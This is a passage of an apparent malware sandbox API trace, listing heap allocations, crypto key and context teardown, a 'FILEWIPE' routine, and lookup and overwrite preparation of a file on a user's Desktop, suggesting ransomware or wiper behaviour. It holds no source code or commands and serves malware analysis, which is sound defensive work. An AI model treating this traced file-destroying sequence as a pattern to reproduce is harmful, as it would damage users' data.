lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0162.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.561] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.561] CryptDestroyKey (hKey=0x90af18) returned 1 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.564] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.564] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.564] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.564] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.564] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.564] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.564] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.564] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.565] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0162.565] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.565] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.565] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.565] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.565] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0162.565] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.565] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.565] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0162.565] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.565] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.565] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.566] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0162.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0162.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.566] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.566] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.566] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.566] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0162.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.566] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.566] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.566] FreeLibrary (hLibModule=0x74f20000) returned 1 [0162.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.566] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.566] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.567] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.568] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.569] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.569] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0162.569] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.572] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.572] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa07af50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x836c1090, ftLastAccessTime.dwHighDateTime=0x1d5e62a, ftLastWriteTime.dwLowDateTime=0x836c1090, ftLastWriteTime.dwHighDateTime=0x1d5e62a, nFileSizeHigh=0x0, nFileSizeLow=0xd79a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="mKicOCoALM.flv", cAlternateFileName="MKICOC~1.FLV")) returned 0x90ae18 [0162.573] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0162.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.573] CharLowerBuffW (in: lpsz="byte[55194]", cchLength=0xb | out: lpsz="byte[55194]") returned 0xb [0162.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.575] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0162.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.575] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0162.575] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0162.575] FreeLibrary (hLibModule=0x75c90000) returned 1 [0162.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.575] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.575] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.575] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0162.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0162.576] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0162.576] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0162.577] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0162.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.577] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0162.577] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0162.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0162.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0162.579] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 